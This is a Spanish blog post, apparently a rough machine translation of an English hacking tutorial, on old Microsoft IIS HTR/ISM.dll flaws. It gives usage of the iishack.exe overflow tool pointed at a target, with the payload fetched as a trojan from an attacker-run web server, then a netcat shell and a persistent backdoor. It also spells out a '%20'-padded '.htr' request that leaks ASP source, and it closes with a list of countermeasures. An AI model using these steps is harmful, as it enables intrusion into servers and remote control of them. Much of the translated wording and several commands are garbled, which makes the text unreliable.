viernes, 1 de abril de 2011

IISHack hacking tools

Saludos Mundo Libre

Herramienta de Hacking: IISHack.exe

iishack.exe desborda un búfer utilizado por el demonio http IIS, lo que permite ejecución de código arbitrario a ser ejecutado.

c: \ www.yourtarget.com iishack 80 www.yourserver.com / thetrojan.exe
www.yourtarget.com es el servidor IIS que está la piratería, el 80 es el puerto a la escucha en su, www.yourserver.com es un servidor web con el troyano o script personalizado (su propia u otra), y / es thetrojan.exe la ruta de acceso a la secuencia de comandos.

"IIS Hack" es una vulnerabilidad de desbordamiento de búfer expuestos por la forma en que IIS trata las solicitudes con. Extensiones HTR. Un pirata informático envía una URL larga que termina con ". HTR". IIS lo interpreta como un tipo de archivo de HTR e invoca el Ism.dll para atender la solicitud. Desde Ism.dll es vulnerable a un desbordamiento de búfer, una cadena cuidadosamente puede ser ejecutado en el contexto de seguridad de IIS, que es privilegiada. Por ejemplo, es relativamente fácil de incluir en el código de explotación de una secuencia de comandos que se abrirá una conexión TCP / IP, descarga un archivo ejecutable y ejecutarlo. De esta manera, cualquier código malicioso puede ser ejecutado.

Un exploit de ejemplo se puede construir como se muestra a continuación:
Para hackear el sitio de destino y el sistema atacante ejecutar un servidor web puede utilizar iishack.exe y ncx.exe.

Para empezar, el ncx.exe está configurado para ejecutarse desde el directorio raíz. IIShack.exe entonces se ejecuta en el sitio víctima.

c: \> iishack.exe 80 / ncx.exe

El atacante puede utilizar netcat para evocar el shell de comandos

c: \ nc> 80

Se puede proceder a cargar y ejecutar cualquier código de su elección y mantener una puerta trasera en el sitio de destino.


IPP Contramedidas de desbordamiento del búfer

Instalar la última versión de Service Pack de Microsoft.
Retire la impresión IPP desde servidor IIS
Instalar cortafuegos y eliminar extensiones no utilizadas
Implementar salida de la red de filtrado agresiva
Utilice IISLockDown y utilidades URLScan
Regularmente escanear su red de servidores vulnerables
Sin más explicaciones, la contramedida primera es, obviamente, para instalar el Service Pack más recientes y las revisiones.

Al igual que con muchas vulnerabilidades de IIS, el IPP explotar se aprovecha de un error en un archivo DLL de ISAPI que se incluye con IIS 5 y está configurado por defecto para tratar las peticiones de ciertos tipos de archivos. Este filtro ISAPI particular, reside en C: \ WINNT \ System32 \ Msw3prt.dll y proporciona Windows 2000 con el apoyo de la IPP. Si esta funcionalidad no es necesaria en el servidor Web, la asignación de aplicación de este archivo DLL de. Archivos de impresora se puede quitar (y, opcionalmente, eliminar la propia DLL) con el fin de evitar que el desbordamiento del búfer de la explotación. Esto es posible debido a que la DLL no se carga en el proceso de IIS cuando se inicia. De hecho, la mayoría de los problemas de seguridad se centran en las asignaciones de ISAPI DLL, haciendo de esta una de las contramedidas más importantes que deben adoptarse cuando se asegura de IIS.

Otra contramedida estándar que se pueden adoptar en este caso es utilizar un servidor de seguridad y quite todas las extensiones que no son necesarios. Implementación de la salida de la red agresiva puede ayudar hasta cierto punto.

Con IIS, utilizando IISLockDown y URLScan - (utilidades gratuitas de Microsoft) puede garantizar una mayor protección y minimizar los daños en caso de que el servidor web se ve afectado.
Microsoft también ha lanzado un parche para el desbordamiento de búfer, pero eliminando el archivo DLL ISAPI es una solución más proactiva en caso de que existan vulnerabilidades adicionales que aún no se han encontrado con el código.


ISAPI DLL revelaciones Fuente

Microsoft IIS 4.0 y 5.0 se puede hacer para divulgar fragmentos de código fuente que de otro modo debe estar en accesible.
Esto se hace añadiendo "+. Htr" a una petición de un conocido. Asp (o. Asa. Ini, etc) de archivos.

añadiendo esta cadena hace que la solicitud para ser manejado por Ism.dll, que luego tiras de la '+. htr "cadena y divulgar parte o la totalidad de la fuente del archivo ASP. especificados en la solicitud.

IIS admite varios tipos de archivos que requieren procesamiento del lado del servidor. Cuando las peticiones de un sitio web los visitantes un archivo de uno de estos tipos, una DLL de filtro apropiado que procesa. Vulnerabilidad se debe a Ism.dll, el archivo DLL de filtro que procesa los archivos. HTR. archivos HTR habilitar la administración remota de contraseñas de usuario.

HTR archivos son scripts que permiten a los servicios de Windows NT contraseña que se proporciona a través de servidores web IIS. Los usuarios de Windows NT puede utilizar. HTR scripts para cambiar sus propias contraseñas, y los administradores pueden utilizar para realizar una amplia gama de funciones de administración de contraseñas. HTR es la primera generación de la tecnología avanzada de secuencias de comandos que se incluye en IIS 3.0, y aún con el apoyo de las versiones posteriores de IIS para la compatibilidad hacia atrás. Sin embargo, HTR nunca fue adoptado ampliamente, y fue sustituido por Active Server Pages (ASP) tecnología introducida en IIS 4.0.

Métodos de ataque
Exploit / Ataque Metodología
Al hacer una solicitud especialmente creada para IIS, con el nombre del archivo y, a continuación añadir alrededor de 230 + "% 20" (que representa los espacios) y, a continuación añadir ". Htr" este IIS trucos en el pensamiento de que el cliente solicita un archivo ". htr "archivo. La extensión de archivo. Htr se asigna a la aplicación Ism.dll ISAPI de IIS y vuelve a dirigir todas las solicitudes de archivos. Htr recursos a este archivo DLL.

Ism.dll continuación, se pasa el nombre del archivo para abrir y ejecutar, pero antes de hacer esto Ism.dll trunca el buffer enviado para cortarle el HTR. Y unos espacios y acaba de abrir el archivo cuyo origen se busca. El contenido se devuelven. Este ataque sólo puede ser puesto en marcha una vez, sin embargo, a menos que el servicio web en marcha y se detuvo. Sólo funciona si se Ism.dll carga por primera vez en la memoria.

"No delimitada solicitud HTR." Vulnerabilidad: La primera vulnerabilidad es una vulnerabilidad de denegación de servicio. Todos los archivos. HTR aceptar ciertos parámetros que se espera que se definan de una manera particular. Esta vulnerabilidad existe debido a la rutina de búsqueda para el delimitador no está bien delimitada. Así, si un usuario malintencionado siempre que una solicitud sin el delimitador de esperar, el filtro ISAPI que los procesos de búsqueda sería para siempre por el delimitador y nunca encuentran.

Si un usuario malintencionado envía una solicitud de cambio de contraseña que carecía de un delimitador de espera, Ism.dll, la extensión ISAPI que procesa los archivos. HTR, que la búsqueda sin fin para él. Esto evitará que el servidor de servicio a las solicitudes de cambio de contraseña más. Además, la búsqueda se consumen tiempo de CPU, por lo que el total de respuesta del servidor puede ser lento.

La segunda amenaza sería más difícil de explotar. A petición del archivo, cuidadosamente construida podría causar la ejecución de código arbitrario en el servidor a través de un clásico desbordamiento de búfer técnica. Ni el escenario podría ocurrir accidentalmente. Esta vulnerabilidad no se recurra a la funcionalidad de las características clave de administración de archivos. HTR.

vulnerabilidad "HTR la lectura de fragmentos de archivos.": La vulnerabilidad podría permitir a los fragmentos de ciertos tipos de archivos para ser leídos por proporcionar una solicitud con formato incorrecto que causa la "HTR la lectura de fragmentos de archivos.". procesamiento HTR que debe aplicarse a ellos. Esta vulnerabilidad podría permitir a un usuario malicioso para leer ciertos tipos de archivos en algunas circunstancias muy restrictiva mediante la imposición de una falsa. Petición HTR. El filtro ISAPI tratará de interpretar el archivo solicitado como un archivo. HTR, y esto tendría el efecto de la eliminación de prácticamente todo, pero el texto de un archivo seleccionado. Es decir, tendría el efecto de despojar a la información misma que es más probable que contenga información confidencial en. Asp y otros archivos en el servidor.

La vulnerabilidad htr. Permitirá que los datos para ser agregados, eliminados o modificados en el servidor, o permitir cualquier control administrativo en el servidor para ser usurpado. Aunque los archivos. HTR se utilizan para permitir la administración de contraseñas basado en web, esta vulnerabilidad no implica debilidad en el manejo de contraseñas.

"En ausencia de Directorio navegador argumento" vulnerabilidad: Entre las secuencias de comandos por defecto HTR siempre en IIS 3.0 (y en conserva durante la actualización a IIS 4.0 e IIS 5.0) se permitió que varios administradores de sitios web para ver los directorios en el servidor.

Una de estas secuencias de comandos, si se llama sin argumentos espera, entrará en un bucle infinito que puede consumir toda la disponibilidad de la CPU del sistema, evitando así que el servidor de responder a las solicitudes de servicio.

Saludos Mundo Libre.

Seguir leyendo:

Fuente:http://hackguide4u.blogspot.com/2011/03/learn-how-to-hack-web-servers.html?utm_source=feedburner&utm_medium=email&utm_campaign=Feed%3A+LearnHowToHackEthicalHacking+%28Learn+How+to+Hack+%2C+Ethical+Hacking+Tutorials+and+Cyber+Security+Tips%29

Traduccion Dellcom1a.

No hay comentarios:

Publicar un comentario